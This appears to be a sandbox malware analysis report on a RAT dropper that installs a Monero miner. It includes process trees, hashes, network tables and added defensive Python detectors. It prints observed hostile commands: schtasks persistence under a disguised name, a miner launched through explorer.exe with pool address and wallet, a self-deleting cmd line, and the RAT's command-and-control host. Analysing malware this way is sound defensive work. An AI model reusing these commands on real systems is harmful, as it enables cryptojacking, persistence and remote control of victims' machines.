ping 1.1.1.1 -n 1 -w 1000

C:\Users\Admin\AppData\Local\Temp\31609.exe

"C:\Users\Admin\AppData\Local\Temp\31609.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45Z2KUa15GKDWbtk11MXVih9n7GnPVpfzW9jk9FuCar8EidLwFBvMH4EoTAzjt7pue3fRnuGx3Sb5g8p4o4mJr3V6Xqu6Cw --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 chispetes.hopto.org udp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 www.iptrackeronline.com udp
US 172.67.74.63:80 www.iptrackeronline.com tcp
US 172.67.74.63:443 www.iptrackeronline.com tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
US 140.82.114.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 199.247.19.116:80 pool.hashvault.pro tcp

Files

memory/1736-54-0x0000000075DA1000-0x0000000075DA3000-memory.dmp

memory/1736-55-0x0000000074290000-0x000000007483B000-memory.dmp

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1428-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1988-62-0x0000000000000000-mapping.dmp

memory/1736-64-0x0000000074290000-0x000000007483B000-memory.dmp

memory/876-63-0x0000000000000000-mapping.dmp

memory/472-66-0x0000000000000000-mapping.dmp

memory/1428-67-0x0000000074290000-0x000000007483B000-memory.dmp

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/1428-70-0x0000000000BE6000-0x0000000000BF7000-memory.dmp

memory/1428-71-0x0000000074290000-0x000000007483B000-memory.dmp

memory/1428-72-0x0000000000BE6000-0x0000000000BF7000-memory.dmp

memory/1504-74-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1504-77-0x000000013FE60000-0x000000013FE70000-memory.dmp

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Local\Temp\31609.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1504-80-0x0000000000750000-0x000000000075E000-memory.dmp

memory/1744-82-0x0000000000000000-mapping.dmp

memory/1504-81-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

memory/1956-83-0x0000000000000000-mapping.dmp

memory/1176-85-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/1176-88-0x000000013F4A0000-0x000000013F4B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\services64.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/828-92-0x0000000000000000-mapping.dmp

memory/332-93-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

memory/1552-98-0x0000000000000000-mapping.dmp

memory/1552-100-0x000000013F780000-0x000000013F786000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

memory/552-101-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-102-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-104-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-106-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-108-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-110-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-111-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-112-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-114-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-116-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-117-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-118-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-120-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-121-0x000000014030F3F8-mapping.dmp

memory/552-123-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-125-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-124-0x00000000000E0000-0x0000000000100000-memory.dmp

memory/552-126-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-127-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-128-0x0000000000000000-0x0000000001200000-memory.dmp

memory/552-129-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-130-0x0000000000000000-0x0000000001200000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-25 13:43

Reported

2022-09-25 13:46

Platform

win10v2004-20220812-en

Max time kernel

152s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

Signatures

Imminent RAT

trojan spyware imminent

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Default Key = "\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe" C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A
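The two "Set value" rows record the RAT writing the Run value named "Default Key" twice: first as a relative path ("\Default Folder\Server.exe") and then as the absolute path under the user's AppData\Local tree. Both forms are worth flagging on a live host for different reasons, and the added example below (it is not part of the report and not the sandbox vendor's code) shows a small triage routine over HKCU Run values rendered the way the report prints them. The benign "VendorTray" entry and the list of user-writable roots are assumptions made for the example; the two "Default Key" values are the report's own.

```python
import ntpath
import re

# Path fragments (lower-cased) that an unprivileged user can write to.
# Assumption for this example; extend to match your environment.
USER_WRITABLE_ROOTS = (
    r"\appdata\local",
    r"\appdata\roaming",
    r"\users\public",
    r"\programdata",
)

# Run values as the report renders them: a single registry backslash is shown
# as '\\' and the string data is wrapped in double quotes.
RUN_VALUES = [
    # The two writes recorded above, in order (same value name, rewritten).
    ("Default Key", r'"\\Default Folder\\Server.exe"'),
    ("Default Key", r'"C:\\Users\\Admin\\AppData\\Local\\Default Folder\\Server.exe"'),
    # Constructed benign entry for contrast; not from the report.
    ("VendorTray", r'"C:\\Program Files\\Vendor\\tray.exe" /minimized'),
]


def unescape_reg_value(raw):
    # Undo the report's doubled backslashes (two characters -> one).
    return raw.replace("\\\\", "\\")


def extract_image_path(command):
    r"""Return the executable path from a Run value's command string.

    Quoted form:   "C:\dir\x.exe" args -> C:\dir\x.exe
    Unquoted form: C:\dir\x.exe args   -> everything up to the first .exe
    """
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end != -1 else cmd[1:]
    m = re.match(r"(.+?\.exe)", cmd, re.IGNORECASE)
    return m.group(1) if m else cmd.split(" ", 1)[0]


def classify_run_entry(raw_value):
    """Return the reasons a Run value looks like user-level persistence abuse."""
    image = extract_image_path(unescape_reg_value(raw_value))
    reasons = []
    # No drive letter or UNC share: the loader resolves the path against
    # whatever working directory or search path applies at logon, so there is
    # no single on-disk binary to audit.
    drive, _ = ntpath.splitdrive(image)
    if not drive:
        reasons.append("relative path")
    # Launched from a tree the user (and so malware running as the user) can
    # overwrite without elevation.
    low = image.lower()
    if any(root in low for root in USER_WRITABLE_ROOTS):
        reasons.append("user-writable location")
    return reasons


def triage_run_values(entries):
    """Return (value_name, image_path, reasons) for entries worth a second look."""
    findings = []
    for name, raw in entries:
        reasons = classify_run_entry(raw)
        if reasons:
            image = extract_image_path(unescape_reg_value(raw))
            findings.append((name, image, reasons))
    return findings


if __name__ == "__main__":
    for name, image, reasons in triage_run_values(RUN_VALUES):
        print(f"{name}: {image} [{', '.join(reasons)}]")
```

On a real host the entries would come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` or an EDR registry-event feed rather than from a report; the classification does not depend on the source.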

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\SysWOW64\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\SysWOW64\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\SysWOW64\Taskmgr.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A 2
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A 41
N/A N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe N/A 1
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A 20

Suspicious use of FindShellTrayWindow

Description Indicator Process Target Count
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A 64

Suspicious use of SendNotifyMessage

Description Indicator Process Target Count
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A 64

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 4648 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe 3
PID 4648 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe 3
PID 4864 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE 3
PID 4972 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\Taskmgr.exe 3
PID 4972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\57080.exe 2

Processes

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\PING.EXE

ping 1.1.1.1 -n 1 -w 1000

C:\Windows\SysWOW64\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\57080.exe

"C:\Users\Admin\AppData\Local\Temp\57080.exe"
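The cmd.exe line in the process list is the dropper's self-removal: ping against 1.1.1.1 with a one-second timeout acts as a delay so the original executable is no longer in use, then Del removes it, by which time the copy under the hash-named subfolder (same SHA256, see the Files section) is already running. The detector below is an added example and not code from the report or the sandbox vendor. It works over process-creation events as an EDR or Sysmon would deliver them; the events here are constructed to mirror the PIDs in the WriteProcessMemory table, while the dropper's own parent PID (1000) and the benign "timeout ... del" contrast event are made up for the example.

```python
import re

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe")

# Constructed process-creation events (pid, ppid, image, command line).
EVENTS = [
    {"pid": 4648, "ppid": 1000, "image": SAMPLE, "command_line": f'"{SAMPLE}"'},
    {"pid": 4864, "ppid": 4648, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": f'"C:\\Windows\\System32\\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "{SAMPLE}"'},
    {"pid": 1392, "ppid": 4864, "image": r"C:\Windows\SysWOW64\PING.EXE",
     "command_line": "ping 1.1.1.1 -n 1 -w 1000"},
    # Benign contrast (constructed): an installer deleting its own temp file is
    # structurally identical, so the is_self_delete flag is what separates them.
    {"pid": 5100, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c timeout /t 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\setup_log.tmp"'},
]

# A delay primitive (ping/timeout/choice, with arguments that contain no
# command separator), then '&', then del/erase with optional switches and a
# quoted or bare path.
DELAY = r"(?:ping|timeout|choice)(?:\.exe)?\s+[^&|]*?"
DELETE = r'(?:del|erase)\s+(?:/[a-z]\s+)*("[^"]+"|\S+)'
SELF_DELETE_RE = re.compile(DELAY + r"&+\s*" + DELETE, re.IGNORECASE)


def deleted_target(command_line):
    """Return the path a delay-then-delete one-liner removes, or None."""
    m = SELF_DELETE_RE.search(command_line)
    return m.group(1).strip('"') if m else None


def find_self_deletes(events):
    """Return (cmd_pid, deleted_path, parent_image, is_self_delete) per hit.

    is_self_delete is True when the file being removed is the executable of
    the process that spawned cmd.exe, i.e. the parent is erasing itself.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        target = deleted_target(e["command_line"])
        if target is None:
            continue
        parent = by_pid.get(e["ppid"])
        parent_image = parent["image"] if parent else None
        is_self = parent_image is not None and parent_image.lower() == target.lower()
        hits.append((e["pid"], target, parent_image, is_self))
    return hits


if __name__ == "__main__":
    for pid, target, parent_image, is_self in find_self_deletes(EVENTS):
        label = "SELF-DELETE" if is_self else "delete via delay"
        print(f"cmd pid {pid}: {label}: {target} (parent: {parent_image})")
```

The regex deliberately requires the delay primitive; a bare `cmd /c del` is common in scripts, whereas ping/timeout followed by del on an executable path is the pattern a self-deleting dropper leaves, and comparing the deleted path with the parent's image turns a noisy string match into a high-confidence alert.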

Network

Country Destination Domain Proto
US 93.184.220.29:80 N/A tcp
US 93.184.221.240:80 N/A tcp
US 20.189.173.13:443 N/A tcp
US 8.8.8.8:53 chispetes.hopto.org udp
ES 90.71.49.17:888 chispetes.hopto.org tcp
NL 87.248.202.1:80 N/A tcp
NL 87.248.202.1:80 N/A tcp
NL 87.248.202.1:80 N/A tcp
US 93.184.220.29:80 N/A tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 www.iptrackeronline.com udp
US 172.67.74.63:80 www.iptrackeronline.com tcp
US 172.67.74.63:443 www.iptrackeronline.com tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
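The table mixes rows with a resolved name and rows without one, which makes the Domain column ambiguous when the text is read by a script. The added example below (not code from the report or the vendor) parses the table as printed, accepting both the three-column rows and a literal N/A in the Domain column, then summarises connections per endpoint and flags what an analyst would pull out as indicators: the repeated TCP sessions to chispetes.hopto.org on port 888 and the DNS lookups behind them. The connection rows are the report's own; the dynamic DNS suffix list (hopto.org and ddns.net belong to No-IP, duckdns.org to Duck DNS) and the set of ports treated as unremarkable are assumptions made for the example.

```python
# Network rows copied from the table above.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
US 20.189.173.13:443 tcp
US 8.8.8.8:53 chispetes.hopto.org udp
ES 90.71.49.17:888 chispetes.hopto.org tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
US 93.184.220.29:80 tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 www.iptrackeronline.com udp
US 172.67.74.63:80 www.iptrackeronline.com tcp
US 172.67.74.63:443 www.iptrackeronline.com tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
"""

# Assumptions for this example: dynamic DNS providers worth flagging, and the
# ports that are unremarkable on their own.
DYNAMIC_DNS_SUFFIXES = ("hopto.org", "ddns.net", "no-ip.org", "duckdns.org")
COMMON_PORTS = {53, 80, 443}


def is_dynamic_dns(domain):
    d = domain.lower()
    return any(d == s or d.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def parse_network_table(text):
    """Parse the whitespace-separated table into one dict per row."""
    rows = []
    for line in text.strip().splitlines()[1:]:      # skip the header row
        parts = line.split()
        if len(parts) == 3:                         # no resolved name
            country, dest, proto = parts
            domain = None
        elif len(parts) == 4:
            country, dest, domain, proto = parts
            if domain.upper() == "N/A":
                domain = None
        else:
            raise ValueError(f"unexpected row layout: {line!r}")
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def summarize_endpoints(rows):
    """Group rows by (ip, port, proto); count hits, collect names, attach flags."""
    summary = {}
    for r in rows:
        key = (r["ip"], r["port"], r["proto"])
        entry = summary.setdefault(key, {"count": 0, "countries": set(),
                                         "domains": set(), "flags": set()})
        entry["count"] += 1
        entry["countries"].add(r["country"])
        if r["domain"]:
            entry["domains"].add(r["domain"])
            if is_dynamic_dns(r["domain"]):
                entry["flags"].add("dynamic-dns")
        if r["port"] not in COMMON_PORTS:
            entry["flags"].add("uncommon-port")
    return summary


def indicators(summary):
    """Endpoints carrying at least one flag, most-contacted first."""
    flagged = [(k, v) for k, v in summary.items() if v["flags"]]
    return sorted(flagged, key=lambda kv: -kv[1]["count"])


if __name__ == "__main__":
    summary = summarize_endpoints(parse_network_table(NETWORK_TABLE))
    for (ip, port, proto), info in indicators(summary):
        print(f"{ip}:{port}/{proto} x{info['count']} "
              f"{sorted(info['domains'])} {sorted(info['flags'])}")
```

The DNS rows to 8.8.8.8 carry the queried name rather than a resolved peer, so the same dynamic DNS flag fires on the resolver row and on the port 888 session it preceded; a blocklist built from this output should therefore include the name, not only the IP that happened to be behind it during detonation.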

Files

memory/4648-132-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4648-133-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4972-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
